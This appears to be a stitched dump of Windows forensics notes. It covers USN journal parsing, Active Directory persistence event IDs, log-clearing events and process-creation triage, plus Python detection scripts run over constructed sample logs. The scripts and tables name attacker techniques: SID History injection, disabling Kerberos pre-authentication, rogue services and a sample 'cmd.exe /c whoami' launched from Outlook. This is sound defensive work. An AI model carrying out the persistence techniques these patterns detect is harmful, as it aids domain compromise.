UsnJrnl2Csv64.exe /UsnJrnlFile:<USNJRNL_J_FILE> /OutputPath:<OUTPUT_DIRECTORY> /TimeZone:"<-12.00 ... 14.00>" /Separator:"<SEPARATOR>"

# May not work properly on newer Windows operating systems.
Get-ForensicUsnJrnl
Get-ForensicUsnJrnl -VolumeName <VOLUME>
Get-ForensicUsnJrnl -Path <PATH>
```

--------------------------------------------------------------------------------

### References

http://forensicinsight.org/wp-content/uploads/2013/07/F-INSIGHT-Advanced-UsnJrnl-Forensics-English.pdf
https://countuponsecurity.com/2017/05/25/digital-forensics-ntfs-change-journal/

--------------------------------------------------------------------------------
/DFIR/Windows/README.md:
--------------------------------------------------------------------------------

# DFIR - Windows

--------------------------------------------------------------------------------
/DFIR/Windows/TTPs_Analysis/ActiveDirectory_persistence.md:
--------------------------------------------------------------------------------

# DFIR - Active Directory persistence

**Windows DFIR notes are no longer maintained on InfoSec-Notes. Updated versions can be found on: [artefacts.help](https://artefacts.help/). This note is however not presently integrated to `artefacts.help`.**

### Active Directory persistence detection through events logs

TODO

The following events could be indicators of persistence on the system:

| Log | Event ID | Description |
|----------|----------|-------------|
| Security | 4720 | `A user account was created`. Logged both for local SAM accounts and domain accounts and includes the creator SID, domain, username and `Logon ID`. |
| Security | 4722 | `A user account was enabled`. Logged both for local SAM accounts and domain accounts and always logged after a Security event `4720 - user account creation`. |
| Security | 4723 | `An attempt was made to change an account's password`. Logged both for local SAM accounts and domain accounts when a user attempts to change his / her own password. This event is logged only if the user entered his / her correct current password and is reported as a failure if the new password fails to meet the password policy. Includes the SID, domain, username and `Logon ID` of the user that performed the password change. |
| Security | 4724 | `An attempt was made to reset an account's password`. Logged both for local SAM accounts and domain accounts when a user attempts to reset another user's password. This event is logged only if the user attempting the password reset has the necessary permissions to do so, and is reported as a failure if the new password fails to meet the password policy. Includes the SID, domain, username and `Logon ID` of the user that performed the password reset. |
| Security | 4670 | `Permissions on an object were changed`. Generated when the permissions (`DACL`) of an object are changed. |
| Security | 4738 | `A user account was changed`. Logged both for local SAM accounts and domain accounts when a user object's attributes are modified. The old and new values of the updated attributes are logged. If all attributes are marked as "-", an update of an attribute that is not listed in the event or a modification of the user object's `DACL` has occurred. The `AD - Exploiting DACL` note can be consulted for more information on exploitable `DACL` on user principal objects. In addition to a potential modification of the user object `DACL`, this event can be used to detect the following persistence means: addition of a SID in the `SID History` of a user; disabling of Kerberos `Require Preauth`, making the account vulnerable to `ASREPRoast`. |
| Security | 4732 | `A member was added to a security-enabled local group`. Logged on domain controllers for Active Directory domain local groups and on member computers for local SAM groups. |
| System | 7030 | `Basic Service Operations`. Occurs when a service is configured as interactive, which is not supported since Windows Vista and Windows Server 2008 (due to the security risks posed by interactive services). |
| System | 7045 | `A service was installed in the system`. |
| System | 7035, 7036 | `The service was successfully sent a control.` and `The service entered the state.` A start / stop control is sent, then the service effectively enters the running / stopped state. |
| Security | 4697 | `A service was installed in the system`, from Windows Server 2016 and Windows 10 (requires the `Audit Security System Extension` subcategory to be enabled). |
| System | 7040 | `The start type of the service was changed`. |
| System | 1056 | DHCP server oddities. |
| Security | 4688 | `A new process has been created`. Occurs when a process is created and includes information about the process: creator subject (SID, account domain and name as well as the `Logon ID`), creator PID, token elevation type, etc. If enabled, the "process command line" field includes the command line of the process. |

TODO 4670 and 4662 and 4728 and 4732 and 4756

Event `4657: A registry value was modified` (`Security` log): this event is
only logged if the key's `SACL` audits the `Set Value` permission for the
user (or a group of which the user is a member) and the `Audit Registry`
subcategory is enabled.
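As an added example (not from the original notes), the checks below implement
in Python the detections described in the table above over constructed
records: `4738` changes setting `SidHistory` or disabling `Require Preauth`,
`4738` events whose listed attributes are all `-`, accounts created (`4720`)
and added to a group (`4728` / `4732` / `4756`) shortly afterwards, and
`7045` / `4697` service installations from an untrusted path. The records are
dictionaries modelled on the per-event fields an `EVTX` parser such as
`EvtxECmd` exposes; the field names follow the Windows `EventData` names, but
the values, the rendered `UserAccountControl` string and the trusted-directory
list are assumptions of the example.

```python
from datetime import datetime, timedelta

# Attributes listed in a 4738 record; all "-" means the change hit an attribute
# the event does not list, or the object's DACL.
TRACKED_ATTRIBUTES = ("SamAccountName", "DisplayName", "UserPrincipalName",
                      "ScriptPath", "AllowedToDelegateTo", "UserAccountControl",
                      "UserParameters", "SidHistory", "LogonHours", "PasswordLastSet")

# Directories a legitimate service image is expected to live in (assumption).
TRUSTED_SERVICE_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

GROUP_ADD_EVENTS = {4728, 4732, 4756}  # global / local / universal group member added


def check_account_change(event):
    """Persistence tells in a 4738 'A user account was changed' record."""
    d, findings = event["Data"], []
    target, actor = d["TargetUserName"], d["SubjectUserName"]
    if d.get("SidHistory", "-") != "-":
        findings.append(f"4738: SID History of {target} set to {d['SidHistory']} by {actor}")
    if "'Don't Require Preauth' - Enabled" in d.get("UserAccountControl", "-"):
        findings.append(f"4738: Kerberos pre-authentication disabled on {target} by {actor} (AS-REP roastable)")
    if all(d.get(attr, "-") == "-" for attr in TRACKED_ATTRIBUTES):
        findings.append(f"4738: {target} changed by {actor} with no listed attribute (unlisted attribute or DACL change)")
    return findings


def check_service_install(event):
    """7045 / 4697: service image outside the trusted directories."""
    d = event["Data"]
    if d["ImagePath"].strip('"').lower().startswith(TRUSTED_SERVICE_DIRS):
        return []
    return [f"{event['EventId']}: service {d['ServiceName']} installed from {d['ImagePath']}"]


def check_group_add_after_creation(events, window=timedelta(minutes=10)):
    """4720 followed by a group addition of the same SID within the window."""
    created = {e["Data"]["TargetSid"]: e for e in events if e["EventId"] == 4720}
    findings = []
    for e in events:
        if e["EventId"] not in GROUP_ADD_EVENTS or e["Data"]["MemberSid"] not in created:
            continue
        origin = created[e["Data"]["MemberSid"]]
        delay = datetime.fromisoformat(e["TimeCreated"]) - datetime.fromisoformat(origin["TimeCreated"])
        if timedelta(0) <= delay <= window:
            findings.append(f"{e['EventId']}: new account {origin['Data']['TargetUserName']} added to "
                            f"{e['Data']['TargetUserName']} {int(delay.total_seconds() // 60)} min after creation")
    return findings


def hunt(events):
    findings = []
    for e in events:
        if e["EventId"] == 4738:
            findings += check_account_change(e)
        elif e["EventId"] in (7045, 4697):
            findings += check_service_install(e)
    return findings + check_group_add_after_creation(events)


def _event(channel, event_id, time, **data):
    return {"Channel": channel, "EventId": event_id, "TimeCreated": time, "Data": data}


# Constructed records (not real logs) modelled on the EventData field names.
NO_CHANGE = {attr: "-" for attr in TRACKED_ATTRIBUTES}
SAMPLE_EVENTS = [
    _event("Security", 4720, "2022-05-02T08:14:09", SubjectUserName="jdoe",
           TargetUserName="svc-backup2", TargetSid="S-1-5-21-1-2-3-1108"),
    _event("Security", 4732, "2022-05-02T08:15:40", SubjectUserName="jdoe",
           MemberSid="S-1-5-21-1-2-3-1108", TargetUserName="Administrators"),
    _event("Security", 4738, "2022-05-02T08:20:01", SubjectUserName="jdoe",
           TargetUserName="svc-backup2", **{**NO_CHANGE, "SidHistory": "S-1-5-21-9-9-9-512"}),
    _event("Security", 4738, "2022-05-02T09:02:17", SubjectUserName="jdoe", TargetUserName="helpdesk",
           **{**NO_CHANGE, "UserAccountControl": "'Don't Require Preauth' - Enabled"}),
    _event("Security", 4738, "2022-05-02T09:30:00", SubjectUserName="jdoe",
           TargetUserName="rsmith", **NO_CHANGE),
    _event("System", 7045, "2022-05-02T10:01:12", ServiceName="WinUpdSvc",
           ImagePath="C:\\Users\\Public\\upd.exe", StartType="auto start"),
    _event("System", 7045, "2022-05-02T10:05:00", ServiceName="BITS",
           ImagePath="C:\\Windows\\System32\\svchost.exe -k netsvcs", StartType="demand start"),
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding)
```

The raw `UserAccountControl` field of a `4738` record carries `%%` message
codes; the check above expects the rendered strings a parser's message map
produces, so adapt the match to the output format actually used.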
33 | 34 | -------------------------------------------------------------------------------- 35 | 36 | ### References 37 | 38 | https://social.technet.microsoft.com/wiki/contents/articles/51185.active-directory-replication-metadata.aspx#:~:text=Replication%20Metadata%20is%20the%20data,in%20Active%20Directory%20(AD) 39 | https://www.harmj0y.net/blog/defense/hunting-with-active-directory-replication-metadata/ 40 | https://social.technet.microsoft.com/wiki/contents/articles/25946.metadata-de-replication-et-analyse-forensic-active-directory-fr-fr.aspx 41 | https://www.ssi.gouv.fr/uploads/2019/04/ad_timeline_first_tc.pdf 42 | -------------------------------------------------------------------------------- /DFIR/Windows/TTPs_Analysis/EVTX_integrity.md: -------------------------------------------------------------------------------- 1 | ###### Logs integrity 2 | 3 | **Windows DFIR notes are no longer maintained on InfoSec-Notes. Updated versions can be found on: [artefacts.help](https://artefacts.help/).** 4 | 5 | The following events occurs whenever the associated logs are cleared: 6 | 7 | - Event: `1102: The audit log was cleared`.
  Location: victim `Security` hive.
  Includes the SID, domain, username and `Logon ID` of the user that cleared
  the logs.

- Event: `104: The System log file was cleared`.
  Location: victim `System` hive.
  Includes the domain and username of the user that cleared the logs.

Additionally, every event of a given event log hive has an `EventRecordID`
field: a sequentially incremented index number of the event in that particular
hive. Any disparity in record ids may reflect the deletion of event(s) in the
hive.

--------------------------------------------------------------------------------
/DFIR/Windows/TTPs_Analysis/Program_execution.md:
--------------------------------------------------------------------------------

# DFIR - Windows - Program execution

**Windows DFIR notes are no longer maintained on InfoSec-Notes. Updated versions can be found on: [artefacts.help](https://artefacts.help/).**

### Security.evtx - 4688: A new process has been created

Event: `4688: A new process has been created`.
Location: victim `Security` hive.
Requires `Audit Process Creation` to be enabled.

This event is logged upon the creation of every new process on the system.

The `NewProcessName` field stores the full path of the process's executable and
the `ProcessId` field the `Process ID (PID)` of the process. The
`ParentProcessName` field logs the full path of the parent process's executable
and can be used to identify suspicious process activity, such as `outlook.exe`
or `iexplore.exe` starting `cmd.exe` or `powershell.exe` processes.

This event includes the SID `SubjectUserSid`, account name `SubjectUserName`,
and domain `SubjectDomainName` of the user creating the process. Additionally,
the `SubjectLogonId` field can be used to correlate the process creation with
the logon session, event `EID: 4624`.

The `TokenElevationType` field represents the privileges of the process and can
take the following values:

| Flag | Correspondence | Description |
|------|----------------|-------------|
| `%%1936` | `TokenElevationTypeDefault` | The process is started with a full token with no privileges removed or groups disabled. A full token is only used if `User Account Control (UAC)` is disabled or if the user starting the process is the built-in `Administrator` (`RID: 500`), `NT AUTHORITY\SYSTEM` or a service account. |
| `%%1937` | `TokenElevationTypeFull` | The process is started with an elevated token with no privileges removed or groups disabled. An elevated token is used when `User Account Control (UAC)` is enabled and the user chooses to start the program in an elevated security context (`Run as administrator` for example). |
| `%%1938` | `TokenElevationTypeLimited` | The process is started with limited privileges: privileges such as `SeImpersonatePrivilege`, `SeDebugPrivilege`, etc. are removed from the process security context. |
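The 4688 triage described above (parent / child pair, `TokenElevationType`, `SubjectLogonId` as the join key to 4624) and the `EventRecordID` continuity check from the logs integrity note can be scripted over events exported as XML. The script below is an added example, not code from the InfoSec-Notes repository: the records it parses are constructed sample data, the function names are mine, and the suspicious parent / child sets contain only the pairs the note itself mentions.

```python
"""Two checks from these notes over EVTX records exported as XML
(constructed sample data; not a real export):

1. EventRecordID continuity: a gap in the per-hive sequential ids may reflect
   deleted event(s); Security 1102 / System 104 mark an explicit log clear.
2. Security 4688 triage: parent/child pair, TokenElevationType decoding and
   SubjectLogonId, the join key to the 4624 logon event.
"""
import xml.etree.ElementTree as ET

# Default namespace of Windows event XML (what EventLogRecord.ToXml() emits).
NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Values from the TokenElevationType table of the note.
TOKEN_ELEVATION = {
    "%%1936": "TokenElevationTypeDefault",
    "%%1937": "TokenElevationTypeFull",
    "%%1938": "TokenElevationTypeLimited",
}

# Parent/child pairs the note calls out; extend with your own baseline.
SUSPICIOUS_PARENTS = {"outlook.exe", "iexplore.exe"}
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe"}


def _record(record_id, event_id, data, channel="Security"):
    """Build a minimal event XML record (constructed sample data)."""
    fields = "".join(f'<Data Name="{k}">{v}</Data>' for k, v in data.items())
    return (
        f'<Event xmlns="{NS["e"]}"><System><EventID>{event_id}</EventID>'
        f"<Channel>{channel}</Channel><EventRecordID>{record_id}</EventRecordID>"
        f"</System><EventData>{fields}</EventData></Event>"
    )


SAMPLE_RECORDS = [  # constructed: ids 1003-1005 are missing on purpose
    _record(1000, 4624, {"TargetUserName": "alice", "TargetLogonId": "0x3e7a1"}),
    _record(1001, 4688, {
        "SubjectUserSid": "S-1-5-21-1-2-3-1001", "SubjectUserName": "alice",
        "SubjectDomainName": "CORP", "SubjectLogonId": "0x3e7a1",
        "NewProcessName": "C:\\Windows\\System32\\cmd.exe", "ProcessId": "0x1a2c",
        "ParentProcessName": "C:\\Program Files\\Microsoft Office\\OUTLOOK.EXE",
        "TokenElevationType": "%%1938", "CommandLine": "cmd.exe /c whoami",
    }),
    _record(1002, 4688, {
        "SubjectUserSid": "S-1-5-21-1-2-3-1001", "SubjectUserName": "alice",
        "SubjectDomainName": "CORP", "SubjectLogonId": "0x3e7a1",
        "NewProcessName": "C:\\Windows\\System32\\notepad.exe", "ProcessId": "0x2b40",
        "ParentProcessName": "C:\\Windows\\explorer.exe",
        "TokenElevationType": "%%1937",  # no CommandLine: cmdline auditing off
    }),
    _record(1006, 1102, {"SubjectUserName": "alice", "SubjectDomainName": "CORP"}),
]


def parse_records(xml_records):
    """Parse XML records into dicts sorted by EventRecordID."""
    out = []
    for xml in xml_records:
        root = ET.fromstring(xml)
        sysnode = root.find("e:System", NS)
        data = {d.get("Name"): (d.text or "")
                for d in root.findall("e:EventData/e:Data", NS)}
        out.append({
            "event_id": int(sysnode.find("e:EventID", NS).text),
            "record_id": int(sysnode.find("e:EventRecordID", NS).text),
            "channel": sysnode.find("e:Channel", NS).text,
            "data": data,
        })
    return sorted(out, key=lambda r: r["record_id"])


def find_record_gaps(records):
    """(previous_id, next_id) pairs where the record ids are not consecutive."""
    ids = [r["record_id"] for r in records]
    return [(a, b) for a, b in zip(ids, ids[1:]) if b != a + 1]


def find_log_clears(records):
    """Record ids of explicit log-clear events: Security 1102, System 104."""
    clears = {("Security", 1102), ("System", 104)}
    return [r["record_id"] for r in records if (r["channel"], r["event_id"]) in clears]


def triage_4688(records):
    """Summarise each 4688 record and flag the parent/child pairs from the note."""
    findings = []
    for r in records:
        if r["event_id"] != 4688:
            continue
        d = r["data"]
        parent = d.get("ParentProcessName", "").rsplit("\\", 1)[-1].lower()
        child = d.get("NewProcessName", "").rsplit("\\", 1)[-1].lower()
        findings.append({
            "record_id": r["record_id"],
            "user": f'{d.get("SubjectDomainName")}\\{d.get("SubjectUserName")}',
            "logon_id": d.get("SubjectLogonId"),  # correlate with 4624
            "parent": parent,
            "child": child,
            "elevation": TOKEN_ELEVATION.get(d.get("TokenElevationType"), "unknown"),
            "command_line": d.get("CommandLine", ""),  # empty unless audited
            "suspicious": parent in SUSPICIOUS_PARENTS and child in SUSPICIOUS_CHILDREN,
        })
    return findings


if __name__ == "__main__":
    recs = parse_records(SAMPLE_RECORDS)
    print("record id gaps:", find_record_gaps(recs))
    print("log clears at record ids:", find_log_clears(recs))
    for finding in triage_4688(recs):
        print(finding)
```

To run it on real data, export records with `Get-WinEvent -Path Security.evtx | ForEach-Object { $_.ToXml() }` and pass the resulting strings to `parse_records`. The gap check compares neighbouring ids only, so feed it one hive (one channel) at a time; mixing channels produces meaningless gaps.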

If the `ProcessCreationIncludeCmdLine_Enabled` audit policy is enabled, the
command line specified at the process creation will be logged in the
`ProcessCommandLine` field.

This event is followed by the `Security` event `4689: Process Termination:
Success and Failure` upon the termination of the process.

### Artefacts

For an overview of the artefacts related to programs execution (`SRUM`,
`UserAssist`, `BAM` / `DAM`, `Shimcache`, `Amcache`, `Prefetch`, ...), refer to
the [artefacts overview note](../Artefacts/_Artefacts_overview.md).

--------------------------------------------------------------------------------

### References

https://digital-forensics.sans.org/media/dfir_poster_2014.pdf
https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4688

--------------------------------------------------------------------------------
/DFIR/Windows/TTPs_Analysis/README.md:
--------------------------------------------------------------------------------

# DFIR - Windows - TTPs analysis

--------------------------------------------------------------------------------
/DFIR/Windows/TTPs_Analysis/System_uptime.md:
--------------------------------------------------------------------------------

# DFIR - Windows - System uptime

**Windows DFIR notes are no longer maintained on InfoSec-Notes.
Updated versions can be found on: [artefacts.help](https://artefacts.help/).**

### EVTX

| File | Event source | Description |
|------|--------------|-------------|
| `System.evtx` | `User32` | Event `1074: The process has initiated the xxx of computer on behalf of user for the following reason: ` |
| `System.evtx` | `EventLog` | Event `6005: The Event log service was started` |
| `System.evtx` | `EventLog` | Event `6006: The Event log service was stopped` |
| `System.evtx` | `Microsoft-Windows-Kernel-General` | Event `12: The operating system started at system time